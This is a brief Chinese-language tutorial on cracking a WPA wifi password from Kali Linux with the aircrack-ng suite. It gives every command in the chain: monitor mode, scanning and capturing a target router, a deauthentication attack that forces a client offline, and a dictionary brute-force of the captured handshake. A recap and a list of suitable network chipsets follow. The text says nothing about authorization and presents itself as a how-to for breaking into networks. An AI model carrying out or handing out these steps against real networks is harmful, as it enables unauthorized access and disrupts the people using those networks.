无线渗透之破解wifi

首先你要有一张支持kali的网卡，因为这整个过程都是在kali下进行的

开启网卡监听模式

# airmon-ng start wlan0

监听附近的无线

# airodump-ng wlan0mon

查看监听的设备

# airodump-ng --bssid B0:D5:9D:EA:9A:E6  -c 1 -w /root/360wifi wlan0mon

–bssid 路由器MAC地址
-c 信道
-w 写入文件的地址

把其中一个设备踢下线

# aireplay-ng -0  30 -a B0:D5:9D:EA:9A:E6  -c 94:87:E0:22:8B:99  wlan0mon

-a 路由器MAC地址
-c 手的MAC地址
-0 发送包的个数

成功抓到握手包

进行暴力破解

# aircrack-ng -w /usr/share/john/password.lst  /root/360wifi-02.cap 

-w 密码字典

总结

iwconfig    //查看网卡
airmon-ng start wlan0      //打开监听
airodump-ng -a wlan0mon     //扫描wifi
airodump-ng --bssid B0:D5:9D:EA:9A:E6  -c 1 -w /root/360wifi wlan0mon   //抓数据包
aireplay-ng -0  30 -a B0:D5:9D:EA:9A:E6  -c 94:87:E0:22:8B:99  wlan0mon      //踢客户端
aircrack-ng -w /usr/share/john/password.lst  /root/360wifi-02.cap      //破解

无线网卡建议选择以下芯片的网卡

Atheros AR9271
Ralink RT3070
Ralink RT3572
Realtek 8187L (Wireless G adapters)
Realtek RTL8812AU (2017年新增)
经过我的测试Ralink RT5370N也是兼容的